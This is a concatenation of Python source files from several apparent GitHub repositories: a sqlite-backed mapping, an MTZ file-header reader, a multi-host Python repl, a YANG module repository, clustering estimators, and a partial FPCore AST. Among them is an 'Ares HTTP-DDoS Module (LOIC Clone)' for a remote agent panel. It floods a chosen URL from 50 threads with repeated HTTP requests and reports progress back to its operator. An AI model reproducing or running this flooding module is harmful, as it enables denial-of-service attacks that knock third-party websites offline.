        # BUGFIX: execute() returns row tuples; unpack so we yield bare keys
        # (previously keys()/values()/items() produced 1-tuples and broke
        # the parameterized lookups they feed into).
        for (k,) in self.execute('select key from store'):
            yield k

    def iterkeys(self):
        return iter(self)

    def keys(self):
        return list(self.iterkeys())

    def itervalues(self):
        for k in self:
            yield self[k]

    def values(self):
        return list(self.itervalues())

    def iteritems(self):
        for k in self:
            yield (k, self[k])

    def items(self):
        return list(self.iteritems())

    def pop(self, k, default='no one will ever pick this'):
        try:
            v = self[k]
            del self[k]
            return v
        except KeyError:
            if default == 'no one will ever pick this':
                raise
            return default

    def popitem(self):
        # NOTE: unlike dict.popitem() this returns only the value, not a
        # (key, value) pair -- kept as-is for backward compatibility.
        for k, v in self.iteritems():
            del self[k]
            return v
        raise KeyError

    def update(self, other, **kw):
        """Copy all mappings from `other` (and keyword args) into the store."""
        # Accept both Python 2 (iteritems) and Python 3 (items) mappings.
        pairs = getattr(other, 'iteritems', other.items)
        for k, v in pairs():
            self[k] = v
        for k, v in kw.items():
            self[k] = v
class Shove(object):
    """A storage-backed mapping object.

    Thin facade over a backing store (currently only 'sqlite://' URIs).
    All attribute access other than the three bookkeeping attributes
    (storeuri, cacheuri, store) is delegated to the backing store.
    """
    def __init__(self, storeuri='sqlite://:memory:', cacheuri=None):
        """Initializes this shove with the given storage uri and cache uri.
        Cache is ignored right now"""
        import sqlite3
        self.storeuri, self.cacheuri = storeuri, cacheuri
        if cacheuri: raise NotImplementedError('MyShove does not support cache uris right now')
        assert storeuri.startswith('sqlite://')
        if storeuri.startswith('sqlite://'):
            # Strip the scheme; a single leading slash is also dropped so
            # 'sqlite:///path' addresses a relative-style path.
            uri = storeuri.replace('sqlite://', '')
            if uri.startswith('/'):
                uri = uri[1:]
            # try a few times to connect
            self.store = {}
            for i in range(10):
                try:
                    self.store = SQLiteStore(uri)
                    break
                except sqlite3.OperationalError: pass
            #print 'store is %s' % (self.store,)
    def __getattr__(self, k):
        # Only called when normal attribute lookup fails; everything
        # unknown is delegated to the backing store.
        # NOTE(review): the __dict__ branch looks unreachable for the three
        # bookkeeping names (normal lookup finds them first once __init__
        # ran) -- presumably defensive; confirm before removing.
        if k in 'storeuri cacheuri store'.split():
            return self.__dict__[k]
        return getattr(self.store, k)
    def __setattr__(self, k, v):
        # Bookkeeping attributes live on this object; all other writes are
        # forwarded to the backing store.
        if k in 'storeuri cacheuri store'.split():
            self.__dict__[k] = v
            return
        setattr(self.store, k, v)
    def __getitem__(self, k):
        return self.store[k]
    def __setitem__(self, k, v):
        self.store[k] = v
| {
"repo_name": "neeraj-kumar/nkpylib",
"path": "nkshove.py",
"copies": "1",
"size": "7036",
"license": "bsd-3-clause",
"hash": 1910703471329517600,
"line_mean": 33.8316831683,
"line_max": 131,
"alpha_frac": 0.5928084139,
"autogenerated": false,
"ratio": 4.300733496332518,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.009082689539983873,
"num_lines": 202
} |
# A replacement for the wrapper for the CCP4 program MTZDUMP using CCTBX
# to access the file directly.
import copy
import os
from iotbx import mtz
class Mtzdump:
    """Drop-in replacement for the CCP4 MTZDUMP wrapper which reads the
    MTZ file header directly through cctbx/iotbx."""

    def __init__(self):
        self._header = {"datasets": [], "dataset_info": {}}
        self._batch_header = {}
        self._batches = None
        self._reflections = 0
        self._resolution_range = (0, 0)

    def set_working_directory(self, wd):
        # Kept for interface compatibility with the old wrapper; no-op.
        pass

    def get_working_directory(self):
        # Kept for interface compatibility with the old wrapper.
        return None

    def set_hklin(self, hklin):
        self._hklin = hklin

    def dump(self):
        """Actually obtain the contents of the mtz file header."""
        assert self._hklin, self._hklin
        assert os.path.exists(self._hklin), self._hklin

        mtz_obj = mtz.object(self._hklin)
        header = self._header

        # Discard any previously cached dataset information.
        header["datasets"] = []
        header["dataset_info"] = {}

        self._batches = [b.num() for b in mtz_obj.batches()]
        header["column_labels"] = [c.label() for c in mtz_obj.columns()]
        header["column_types"] = [c.type() for c in mtz_obj.columns()]
        self._resolution_range = mtz_obj.max_min_resolution()
        header["spacegroup"] = mtz_obj.space_group_name()
        self._reflections = mtz_obj.n_reflections()

        for crystal in mtz_obj.crystals():
            if crystal.name() == "HKL_base":
                # Skip the synthetic base crystal.
                continue
            pname = crystal.project_name()
            xname = crystal.name()
            cell = crystal.unit_cell().parameters()
            for dataset in crystal.datasets():
                dataset_id = f"{pname}/{xname}/{dataset.name()}"
                assert dataset_id not in header["datasets"]
                header["datasets"].append(dataset_id)
                header["dataset_info"][dataset_id] = {
                    "wavelength": dataset.wavelength(),
                    "cell": cell,
                    "id": dataset.i_dataset(),
                }

    def get_columns(self):
        """Get a list of the columns and their types as (label, type)
        tuples in a list."""
        return list(
            zip(self._header["column_labels"], self._header["column_types"])
        )

    def get_resolution_range(self):
        return self._resolution_range

    def get_datasets(self):
        """Return a list of available datasets."""
        return self._header["datasets"]

    def get_dataset_info(self, dataset):
        """Get the cell, spacegroup & wavelength associated with a
        dataset, specified as pname/xname/dname."""
        info = copy.deepcopy(self._header["dataset_info"][dataset])
        info["spacegroup"] = self._header["spacegroup"]
        return info

    def get_spacegroup(self):
        """Get the spacegroup recorded for this reflection file."""
        return self._header["spacegroup"]

    def get_batches(self):
        """Get a list of batches found in this reflection file."""
        return self._batches

    def get_reflections(self):
        """Return the number of reflections in the reflection file."""
        return self._reflections
| {
"repo_name": "xia2/xia2",
"path": "src/xia2/Modules/Mtzdump.py",
"copies": "1",
"size": "3590",
"license": "bsd-3-clause",
"hash": -5232688800228670000,
"line_mean": 31.0535714286,
"line_max": 88,
"alpha_frac": 0.591086351,
"autogenerated": false,
"ratio": 4.0610859728506785,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5152172323850679,
"avg_score": null,
"num_lines": null
} |
"""A repl across hosts."""
from __future__ import print_function, unicode_literals
import ast
import sys
import traceback
PY2 = sys.version_info < (3,)  # True when running under Python 2

# Pick the StringIO implementation available on this interpreter.
if PY2:
    from cStringIO import StringIO
else:
    from io import StringIO

if PY2:
    input = raw_input  # noqa

    # Function form of Python 2's `exec` statement. The outer exec runs the
    # literal source "exec code in namespace", which the Python 2 parser
    # accepts; `code` and `namespace` resolve from this function's locals.
    def exec_(code, namespace):
        exec('exec code in namespace')
else:
    # On Python 3 `exec` is a builtin function, but naming it directly would
    # be a syntax error when this file is *parsed* by Python 2 -- eval()
    # defers the lookup to runtime.
    exec_ = eval('exec')
def read_stmt():
    """Read one complete Python statement from stdin.

    Mirrors the interactive interpreter: keeps prompting with '... ' while
    the accumulated text is an incomplete compound statement (detected via
    ast.parse raising 'unexpected EOF while parsing'). Exits the process on
    EOF (Ctrl-D). Returns the statement source, newline-terminated. Any
    other SyntaxError propagates to the caller.
    """
    stmt = ''
    prompt = '>>> '
    while True:
        try:
            line = input(prompt)
        except EOFError:
            # Ctrl-D: finish the current line visually and quit the repl.
            print()
            sys.exit(0)
        stmt += line + '\n'
        try:
            ast.parse(stmt)
        except SyntaxError as e:
            msg = e.args[0]
            if msg == 'unexpected EOF while parsing':
                # Statement is incomplete (e.g. an open block): keep reading.
                prompt = '... '
                continue
            raise
        else:
            # An indented line inside a block parses on its own, but the
            # user is still typing the block -- keep collecting until an
            # unindented line arrives.
            if line.startswith((' ', '\t')) and prompt == '... ':
                continue
            return stmt
namespace = {}  # Shared namespace persisted across executed statements


def runit(stmt):
    """Compile and execute one statement, capturing its stdout.

    Returns (True, captured_output) on success, or
    (False, formatted_traceback) when execution raised.
    """
    code = compile(stmt, '<stdin>', 'single', dont_inherit=True)
    buf = StringIO()
    orig_stdout = sys.stdout
    sys.stdout = buf  # capture prints emitted by the executed statement
    try:
        exec_(code, namespace)
    except Exception:
        return False, traceback.format_exc()
    finally:
        # BUGFIX: the original never restored sys.stdout, leaving the
        # interpreter's stdout permanently redirected into the (discarded)
        # buffer after the first call.
        sys.stdout = orig_stdout
    return True, buf.getvalue()
def dorepl(group):
    """Run one read-eval-print cycle across every host in `group`.

    Reads a statement locally, executes it on all hosts via chopsticks,
    then prints each host's output -- green for success, red for failure
    when stderr is a tty. When every host produced the same result, the
    per-host lines are collapsed into a single 'all N' entry.
    """
    from chopsticks.tunnel import ErrorResult
    # Import runit by module path so chopsticks can pickle a reference to it
    # for the remote side.
    from repl import runit
    try:
        stmt = read_stmt()
    except Exception:
        # A syntax error in the typed statement: report and re-prompt.
        traceback.print_exc()
        return
    results = group.call(runit, stmt)
    vals = list(results.values())
    if all(vals[0] == v for v in vals[1:]):
        # Every host agreed; report once instead of per host.
        results = {'all %d' % len(vals): vals[0]}
    for host, result in sorted(results.items()):
        if isinstance(result, ErrorResult):
            # Chopsticks-level failure (connection, serialization, ...).
            success = False
            result = result.msg
        else:
            success, result = result
        color = '32' if success else '31'  # ANSI green / red
        if sys.stderr.isatty():
            fmt = '\x1b[{color}m[{host}]\x1b[0m {l}'
        else:
            fmt = '[{host}] {l}'
        for l in result.splitlines():
            print(fmt.format(host=host, color=color, l=l))
if __name__ == '__main__':
    from chopsticks.tunnel import Docker
    from chopsticks.group import Group
    import chopsticks.ioloop

    # Protocol 2 is the highest pickle protocol common to all the Python
    # versions targeted below.
    chopsticks.tunnel.PICKLE_LEVEL = 2

    class Py2Docker(Docker):
        # Docker tunnel that launches python2 inside the container.
        python3 = 'python2'

    # One container per interpreter version; each statement typed at the
    # repl is executed on all of them.
    group = Group([
        Py2Docker('python2.7', image='python:2.7'),
        Docker('python3.3', image='python:3.3'),
        Docker('python3.4', image='python:3.4'),
        Docker('python3.5', image='python:3.5'),
        Docker('python3.6', image='python:3.6'),
    ])
    try:
        while True:
            dorepl(group)
    finally:
        # Drop the group so tunnels/containers are torn down on exit.
        del group
| {
"repo_name": "lordmauve/chopsticks",
"path": "repl.py",
"copies": "1",
"size": "2656",
"license": "apache-2.0",
"hash": 4050363647918983700,
"line_mean": 23.3669724771,
"line_max": 65,
"alpha_frac": 0.5410391566,
"autogenerated": false,
"ratio": 3.7942857142857145,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.983268423834105,
"avg_score": 0.0005281265089328827,
"num_lines": 109
} |
"""A repository for searching and holding loaded pyang modules"""
import os
import sys
import io
from . import util
from . import syntax
class Repository(object):
    """Abstract base class that represents a module repository"""

    def get_modules_and_revisions(self, ctx):
        """Return a list of all modules and their revisions.

        Each entry is a tuple (`modulename`, `revision`, `handle`);
        `handle` is an opaque value passed back to
        get_module_from_handle() to retrieve that module's text.
        """

    def get_module_from_handle(self, handle):
        """Return the raw module text identified by `handle`.

        On success returns (`ref`, `in_format`, `text`), where `ref` is a
        string naming the source of the text for user-facing error
        messages, `in_format` is one of 'yang', 'yin' or None, and `text`
        is the raw data; returns None when the module is not found.

        Raises `ReadError` when retrieval fails.
        """

    class ReadError(Exception):
        """Signals that an error occured during module retrieval"""
class FileRepository(Repository):
    """Repository that searches a list of filesystem directories for
    YANG/YIN module files."""

    def __init__(self, path="", use_env=True, no_path_recurse=False,
                 verbose=False):
        """Create a Repository which searches the filesystem for modules

        `path` is a `os.pathsep`-separated string of directories
        """
        Repository.__init__(self)
        self.dirs = []                       # ordered, de-duplicated search path
        self.no_path_recurse = no_path_recurse
        self.modules = None                  # filled lazily by _setup()
        self.verbose = verbose
        for directory in path.split(os.pathsep):
            self._add_directory(directory)
        # One-shot "loop": `use_env` is cleared immediately, so this runs at
        # most once; `break` aborts the search at the first conclusive
        # install location.
        while use_env:
            use_env = False
            modpath = os.getenv('YANG_MODPATH')
            if modpath is not None:
                for directory in modpath.split(os.pathsep):
                    self._add_directory(directory)
            home = os.getenv('HOME')
            if home is not None:
                self._add_directory(os.path.join(home, 'yang', 'modules'))
            inst = os.getenv('YANG_INSTALL')
            if inst is not None:
                self._add_directory(os.path.join(inst, 'yang', 'modules'))
                break  # skip search if install location is indicated
            default_install = os.path.join(
                sys.prefix, 'share', 'yang', 'modules')
            if os.path.exists(default_install):
                self._add_directory(default_install)
                break  # end search if default location exists
            # for some systems, sys.prefix returns `/usr`
            # but the real location is `/usr/local`
            # if the package is installed with pip
            # this information can be easily retrieved
            import pkgutil
            if not pkgutil.find_loader('pip'):
                break  # abort search if pip is not installed
            # hack below to handle pip 10 internals
            # if someone knows pip and how to fix this, it would be great!
            # NOTE(review): the bare excepts are deliberate here -- pip's
            # internal layout varies across versions and any failure should
            # silently fall through to "location unknown".
            location = None
            try:
                import pip.locations as locations
                location = locations.distutils_scheme('pyang')
            except:
                try:
                    import pip._internal.locations as locations
                    location = locations.distutils_scheme('pyang')
                except:
                    pass
            if location is not None:
                self._add_directory(
                    os.path.join(location['data'], 'share', 'yang', 'modules'))
        if verbose:
            sys.stderr.write('# module search path: %s\n'
                             % os.pathsep.join(self.dirs))

    def _add_directory(self, directory):
        """Append `directory` to the search path; reject empty names,
        duplicates and non-directories. Returns True when added."""
        if (not directory
            or directory in self.dirs
            or not os.path.isdir(directory)):
            return False
        self.dirs.append(directory)
        return True

    def _setup(self, ctx):
        # check all dirs for yang and yin files
        self.modules = []
        def add_files_from_dir(d):
            # Collect module files in `d`, recursing into subdirectories
            # unless no_path_recurse is set.
            try:
                files = os.listdir(d)
            except OSError:
                files = []
            for fname in files:
                absfilename = os.path.join(d, fname)
                if os.path.isfile(absfilename):
                    # Filename must match <name>[@<revision>].(yang|yin).
                    m = syntax.re_filename.search(fname)
                    if m is not None:
                        name, rev, in_format = m.groups()
                        if not os.access(absfilename, os.R_OK):
                            continue  # unreadable: skip silently
                        if absfilename.startswith("./"):
                            absfilename = absfilename[2:]
                        handle = in_format, absfilename
                        self.modules.append((name, rev, handle))
                elif (not self.no_path_recurse
                      and d != '.' and os.path.isdir(absfilename)):
                    add_files_from_dir(absfilename)
        for d in self.dirs:
            add_files_from_dir(d)

    def get_modules_and_revisions(self, ctx):
        # Scan the directories lazily on first use; cached thereafter.
        if self.modules is None:
            self._setup(ctx)
        return self.modules

    def get_module_from_handle(self, handle):
        """Read the file named by `handle` and return
        (`absfilename`, `format`, `text`).
        Raises self.ReadError on I/O or encoding problems."""
        in_format, absfilename = handle
        fd = None
        try:
            fd = io.open(absfilename, "r", encoding="utf-8")
            text = fd.read()
            if self.verbose:
                util.report_file_read(absfilename)
        except IOError as ex:
            raise self.ReadError("%s: %s" % (absfilename, ex))
        except UnicodeDecodeError as ex:
            s = str(ex).replace('utf-8', 'utf8')
            raise self.ReadError("%s: unicode error: %s" % (absfilename, s))
        finally:
            if fd is not None:
                fd.close()
        if in_format is None:
            # No extension hint: sniff the content.
            in_format = util.guess_format(text)
        return absfilename, in_format, text
| {
"repo_name": "mbj4668/pyang",
"path": "pyang/repository.py",
"copies": "1",
"size": "5853",
"license": "isc",
"hash": 7259231834219622000,
"line_mean": 35.1296296296,
"line_max": 79,
"alpha_frac": 0.5375021357,
"autogenerated": false,
"ratio": 4.491941673062164,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0011138195316939279,
"num_lines": 162
} |
"""A repository of custom sklearn estimators."""
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.cluster import MiniBatchKMeans
from sklearn.exceptions import NotFittedError
from sklearn.utils.validation import check_array
from nlp_playground.exceptions import BadValidation
from nlp_playground.lib.sequences import greedy_translate
class DummyEstimator(BaseEstimator):
    """
    Dummy estimator to fit the interface and not do anything.

    This is nice to have for testing, debugging, and
    who-knows-what-else.
    """

    # pylint: disable=invalid-name,unused-argument
    def fit(self, X, y=None):
        """Mock estimator fit method: validates X, learns nothing."""
        check_array(X)
        return self

    def predict(self, X):  # pylint: disable=invalid-name
        """Mock estimator predict method: returns the row indices of X."""
        check_array(X)
        return np.arange(len(X))

    def transform(self, X):  # pylint: disable=invalid-name
        """Mock estimator transform method: returns X unchanged."""
        check_array(X)
        return X

    def score(self, X, y=None):  # pylint: disable=invalid-name
        """Mock estimator score method: returns X[0][0] as the 'score'."""
        return X[0][0]
class ClusteringWithSupervision(BaseEstimator):
    """
    Benchmark unsupervised learning against supervised target labels.

    This is a scikit-learn estimator that acts as a utility for when
    trying to produce unsupervised learning results that match
    class labels.

    We take a scikit-learn clustering algorithm and fit the
    model to our dataset. The number of clusters used (`n_clusters`),
    is the same as the number of different classes that our dataset
    has.

    We use some heuristics to figure out which cluster corresponds
    to which class, and then treat our model as a supervised
    learning classifier.

    Example:
        >>> from sklearn.estimators import MiniBatchKMeans
        >>> c = ClusteringWithSupervision(cluster_instance=MiniBatchKMeans())
        >>> c.fit(data, labels)
        >>> c.score(data, labels)

    Args:
        cluster_instance: An instance of a scikit-learn clustering
            class.
    """
    # Class-level defaults so the names always resolve through __getattr__'s
    # normal-lookup path before delegation kicks in.
    n_clusters = None
    _n_clusters = None          # number of clusters derived from y in fit()
    cluster_instance = None     # user-supplied template estimator
    _cluster_instance = None    # fresh copy actually fitted in fit()
    _is_fitted = False

    def __init__(self, **params):
        """Initialize the class."""
        self.set_params(**params)

    def __getattr__(self, name):
        """
        Look up missing attributes on clustering instance.

        The scikit-learn Estimator API assumes that every parameter
        passed to `__init__()` or `get_params()` will become
        a parameter on the estimator object.

        Since most of the parameters for this class will really
        be the parameters for the underlying estimator at
        `self.cluster_instance`, we pass on key lookups to our
        child.
        """
        # NOTE(review): only called when normal lookup fails; if
        # cluster_instance is still None this raises AttributeError from
        # getattr -- confirm no recursion path exists during unpickling.
        return getattr(self.cluster_instance, name)

    def _assert_is_fitted(self):
        """Make sure that our underlying estimator is fitted."""
        if not self._is_fitted:
            raise NotFittedError(
                "This {} instance is not fitted yet. Call 'fit' with "
                "appropriate arguments before using this method."
                .format(type(self).__name__)
            )

    def get_params(self, deep=True):
        """Return the cluster instance and its own parameters."""
        if not self.cluster_instance:
            # Default estimator when none was supplied.
            self.cluster_instance = MiniBatchKMeans()
        return {
            'cluster_instance': self.cluster_instance,
            **self.cluster_instance.get_params(deep),
            'n_clusters': self.n_clusters
        }

    def set_params(self, **params):
        """
        Set the parameters for this estimator.

        `cluster_instance` is a parameter that lets us pick
        what estimator we actually want to use. All other possible
        parameters are just passed to `cluster_instance.set_params()`.
        """
        if not params:
            return self
        cluster_instance = params.pop('cluster_instance', None)
        self.cluster_instance = cluster_instance or MiniBatchKMeans()
        # NOTE(review): this returns the inner estimator rather than `self`;
        # sklearn's convention is to return self -- confirm callers do not
        # rely on the return value.
        return self.cluster_instance.set_params(**params)

    def fit(self, X, y):  # pylint: disable=invalid-name
        """
        Fit `X` with the same number of clusters as `y` as unique items.

        Calculate the number of unique class labels are in `y`,
        and then train a clustering algorithm on `X` where we look
        for the same number of clusters as classes.
        """
        if not hasattr(self.cluster_instance, 'get_params'):
            raise BadValidation(
                "Please pass `cluster_instance` parameter with a"
                " scikit-learn clustering estimator."
            )
        self._n_clusters = len(set(y))
        params = self.cluster_instance.get_params()
        params['n_clusters'] = self._n_clusters
        # The scikit-learn estimator interface doesn't let us
        # have mutable public object attributes.
        # Additionally, scikit-learn's clone() function breaks if
        # we assign an estimator class instead of an object.
        self._cluster_instance = self.cluster_instance.__class__(
            **params
        )
        self._cluster_instance.fit(X, y)
        self._is_fitted = True
        return self

    def predict(self, X):  # pylint: disable=invalid-name
        """Wrap `self.cluster_instance.predict()`."""
        self._assert_is_fitted()
        return self._cluster_instance.predict(X)

    def transform(self, X):  # pylint: disable=invalid-name
        """Wrap for `self.cluster_instance.transform()`."""
        self._assert_is_fitted()
        return self._cluster_instance.transform(X)

    def score(self, X, y=None):  # pylint: disable=invalid-name
        """
        Score our estimator, with or without labels.

        If the argument `y` is not `None`, then we
        score our model's *prediction* from X against
        y with Adjusted Mutual Information scoring.

        If `y` is `None`, then we just wrap
        `self.cluster_instance.score()`.
        """
        self._assert_is_fitted()
        if y is not None:
            predictions = self.predict(X)
            return translate_score(predictions, y)
        return self._cluster_instance.score(X)
def translate_score(predictions, ground_truth) -> float:
    """
    Score cluster assignments against labels after relabeling.

    Cluster ids from a clustering algorithm are arbitrary: for four data
    points and two clusters, the arrays ``[0, 0, 1, 1]`` and
    ``[1, 1, 0, 0]`` describe the same clustering. Direct comparison with
    labeled targets is therefore meaningless, so we first "translate" the
    assignments (via ``greedy_translate``) onto the label configuration
    with the smallest Hamming distance from the ground truth, then report
    the mean accuracy of that translated configuration.

    Args:
        predictions: Results from a clustering algorithm.
        ground_truth: "Ground truth results". These typically
            have labels with fixed positions, and are generally
            used for training classifiers.

    Returns:
        The mean accuracy for the results.
    """
    translated = np.array(greedy_translate(predictions, ground_truth))
    return np.mean(ground_truth == translated)
| {
"repo_name": "jamesmishra/nlp-playground",
"path": "nlp_playground/lib/sklearn/estimators.py",
"copies": "1",
"size": "7347",
"license": "mit",
"hash": 5144869967980370000,
"line_mean": 33.1720930233,
"line_max": 77,
"alpha_frac": 0.6363141418,
"autogenerated": false,
"ratio": 4.455427531837477,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5591741673637477,
"avg_score": null,
"num_lines": null
} |
"""A representation of the World."""
import random
from sys import stdout
from existenz.globe import Globe
class World(object):
    """Representation of the world for denizens to live and die."""

    def __init__(self, size=10):
        self._size = size
        self._day = 0
        # Double-buffered globes: the live world and the one being computed.
        self._current_globe = Globe(self._size)
        self._future_globe = Globe(self._size)
        # Seed the current world deterministically for now.
        random.seed(1)  # todo: raul - replace this will random configuration
        for location in self.globe.locations:
            location.plant = random.randint(0, 1)
        self.dump_world()

    @property
    def globe(self):
        """A representation of the current state of the world."""
        return self._current_globe

    @property
    def future_world(self):
        """A representation of the future world being constructed."""
        return self._future_globe

    @property
    def size(self):
        """The size of the world length.

        The total number of locations is equivalent to size * size.
        """
        return self._size

    def rotate(self, days=1):
        """Cycle through a given number of days in the world.

        :param days: The number of days the world should life-cycle it
            denizens.
        :type days: int
        """
        for _ in range(days):
            self._day += 1
            self.process_plants()
            # Swap buffers: the freshly computed globe becomes current.
            self._current_globe, self._future_globe = (
                self._future_globe, self._current_globe)
            self.dump_world()

    def process_plants(self):
        """Method that will life-cycle plants in the world."""
        for loc in self.globe.locations:
            self.future_world.get_location(loc.x, loc.y).plant = self.grow(loc)

    def grow(self, location):
        """Decide whether a plant occupies `location` on the next day.

        Life-like rules: an existing plant survives with 2-4 living
        neighbours; an empty cell sprouts with exactly 3.

        :param location: A candidate location for plant life.
        :type location: existenz.location.Location
        :return: 1 if the location should have a plant, else 0.
        :rtype: int
        """
        neighbors = self.globe.get_neighbors(location.x, location.y)
        alive = sum(1 for neighbor in neighbors if neighbor.plant)
        if location.plant:
            return 1 if 2 <= alive <= 4 else 0
        return 1 if alive == 3 else 0

    def dump_world(self):
        """Method that will dump the state of the current world to stdio."""
        stdout.write('-- day: ' + str(self._day) + '\n')
        for row in range(0, self.size):
            for col in range(0, self.size):
                loc = self._current_globe.locations[(self.size * row) + col]
                stdout.write(str(loc))
            stdout.write('\n')
| {
"repo_name": "neoinsanity/existenz",
"path": "existenz/world.py",
"copies": "1",
"size": "3232",
"license": "apache-2.0",
"hash": 6868204092069047000,
"line_mean": 31,
"line_max": 80,
"alpha_frac": 0.5770420792,
"autogenerated": false,
"ratio": 4.15958815958816,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.523663023878816,
"avg_score": null,
"num_lines": null
} |
# Ares HTTP-DDoS Module (LOIC Clone)
# Pythogen
# Build 1.2
# Not intended for illegal uses.
# 12/27/2015 - 4:34 PM - Bug fix: DDoS completion notice now correctly synchronized.
# 12/27/2015 - 4:42 PM - Update: Functional stop feature now included.
# 12/29/2015 - 1:01 PM - Update: Functionality refinement. Clean up syntax.
# 12/29/2015 - 2:58 PM - Update: Informs when every thousand requests have been sent until completion. (Panel Feedback)
# Panel commands:
# ddos http://[host]/ [requests]
# ddos http://something.com/ 10000
# ddos stop 0
# Make sure to include 'ddos' in MODULES array in agent.py
# - Import Modules -
import requests
import time
import threading
import pythoncom
import pyHook
import utils
import random
import socket
import sys
import os
import string
from threading import Thread
from urllib import urlopen
from atexit import register
from os import _exit
from sys import stdout, argv
# - Stress functions -
def complete():
# Announce completion
utils.send_output("DDoS Complete.")
# Note: 10 Threads
def auto_send_request(server, number_of_requests=10):
# Globalize increment variable
global inc
global isDos
# Value for completion notification condition
requestsCheck = (requests - 1)
for z in range(number_of_requests):
try:
# Is it active?
if isDos == True:
# HTTP Connection >>
urlopen(server)
# Successful connection [!]
stdout.write(".") # indicated by period in console (for debugging)
# Increment ++
inc = inc + 1 # Count total requests sent
# Live display every thousand requests.
if inc % 1000 == 0:
utils.send_output("Requests: %s." % (inc))
# if not active then break ..
elif isDos == False:
break
except IOError:
# Failed connection [!]
stdout.write("E") # indicated by E in console (for debugging)
# Request count checking
if inc >= requestsCheck:
# Finished DDoS Session! Call next function
complete()
# Flood routine
def flood(url, number_of_requests = 1000, number_of_threads = 50):
number_of_requests_per_thread = int(number_of_requests/number_of_threads)
try:
for x in range(number_of_threads):
Thread(target=auto_send_request, args=(url, number_of_requests_per_thread)).start()
except:
stdout.write("\n[E]\n")
print("\nDone %i requests on %s" % (number_of_requests, url))
# - Command control -
def run(action, num_req):
# Globalize variables
global requests
global inc
global isDos
# inc initially set to 0
inc = 0
# isDos boolean
isDos = False
try:
# If command passed is not 'stop' then it's a host
if action != "stop":
utils.send_output("DDoS Started.")
# Boolean value that determines if stresser is active
isDos = True
# Argument passed from Wares panel
server = action # Host put in server
# Number of requests
requests = int(num_req) # Specified number of requests
# Call function to begin attack
flood(server, requests)
# Halt process
elif action == "stop":
# Turn it off
isDos = False
utils.send_output('DDoS Stopped.')
else:
# Display current commands
utils.send_output("Usage: DDoS [host] [requests]|stop 0")
except Exception, exc:
utils.send_output(exc)
def help():
# Help command details
help_text = """
Usage: ddos [host] [requests]|stop 0
HTTP-DDoS.
"""
return help_text
| {
"repo_name": "EzLucky/Wares",
"path": "client/modules/ddos.py",
"copies": "1",
"size": "3862",
"license": "mit",
"hash": -118286514455478420,
"line_mean": 22.265060241,
"line_max": 119,
"alpha_frac": 0.599430347,
"autogenerated": false,
"ratio": 3.9814432989690722,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5080873645969072,
"avg_score": null,
"num_lines": null
} |
# A resource can be any object that implements the following protocol:
#
# PROPERTIES
#
# name
# """ The machine-readable name for the resource. This should be a valid
# URI path element, and by convention, should only use alphanumeric ASCII
# characters and/or - and _. Other characters will probably also work but
# produce ugly URLs.
# """
#
# METHODS
#
# def list(self, offset=0, limit=None, ordering=None):
# """ Returns one of:
# a) a list of documents according to the specified pagination and ordering.
# b) a dictionary containing the keys "count" (specifying the total number of
# objects in the list; optional) and "items" (the actual items after
# pagination and ordering).
# """
#
# def item(self, key):
# """ Returns the document for the specified key, or None if the document
# could not be found.
# """
#
# def store(self, item, key=None, overwrite=True):
# """ Creates or updates the item in the collection. If "key" is given, any
# existing item at this position should be overwritten, unless "overwrite" is
# set to False. If "key" is not given, then a new key should be generated by the
# backend. Returns a tuple of (key, item, action) on successful insertion or
# update (action will be "INSERT" or "UPDATE" to indicate which happened), or
# throws a suitable exception if the insertion failed.
# """
#
# def delete(self, key):
# """ Deletes the item at "key" if it exists. Throws a suitable exception if
# the item cannot be deleted or doesn't exist.
# """
#
# def structure_item(self, item):
# """ Transforms the specified "item" into a "dumb" data structure. A dumb data
# structure is roughly equivalent to the JSON grammar; in practice, it means
# that only the following data structures should be used:
# - scalars: integers, floats, booleans, strings
# - lists ("list")
# - dictionaries ("dict")
# - nulls ("None")
# Resources that do not define this method are required to return dumb data from
# all retrievals directly.
| {
"repo_name": "tracksinspector/papi",
"path": "papi/resource.py",
"copies": "1",
"size": "1959",
"license": "mit",
"hash": 6342293443702749000,
"line_mean": 38.18,
"line_max": 80,
"alpha_frac": 0.718734048,
"autogenerated": false,
"ratio": 3.7745664739884393,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4993300521988439,
"avg_score": null,
"num_lines": null
} |
"""A reusable AST for manipulating or executing FPCores in python."""
import typing
def sexp_to_string(e):
    """Render *e* as an s-expression string.

    Lists and tuples become parenthesized, space-separated groups
    (recursively); anything else is rendered with str().
    """
    if not isinstance(e, (list, tuple)):
        return str(e)
    rendered = (sexp_to_string(item) for item in e)
    return '({})'.format(' '.join(rendered))
def annotation_to_string(e, props, shape=None):
    """Render an expression or argument with optional annotations.

    - e: the expression/argument name (stringified with str()).
    - props: dict of FPCore properties; when non-empty the result is
      wrapped in a (! :key value ... body) annotation.
    - shape: optional sequence of dimension expressions; when given,
      the dims follow the name, space-separated.

    Fixed: the dimensions were previously joined without a separator
    after the name, producing e.g. '(x5 6)' instead of '(x 5 6)'.
    """
    if shape:
        dims = ' ' + ' '.join(sexp_to_string(dim) for dim in shape)
    else:
        dims = ''
    if props:
        # Each ':key value' pair carries its own trailing space.
        prop_str = ''.join(':' + k + ' ' + sexp_to_string(v) + ' ' for k, v in props.items())
        # FPCore annotated arguments are flat: (! props... name dims...)
        return '(! ' + prop_str + str(e) + dims + ')'
    elif shape:
        return '(' + str(e) + dims + ')'
    else:
        return str(e)
def diff_props(global_props, local_props):
    """Combine inherited and local annotation properties.

    Returns (all_props, new_props): all_props is the effective property
    set at this point in the tree, and new_props is the subset that the
    local annotation actually changes relative to the inherited one.
    None arguments mean "no properties at that level".
    """
    if global_props is None:
        if local_props is None:
            return {}, {}
        return local_props, local_props
    if local_props is None:
        return global_props, {}
    combined = dict(global_props)
    combined.update(local_props)
    changed = {k: v for k, v in local_props.items()
               if k not in global_props or global_props[k] != v}
    return combined, changed
def update_props(old_props, new_props):
    """Overlay new_props on old_props, preferring the new values.

    Falsy arguments are passed straight through (so the result may
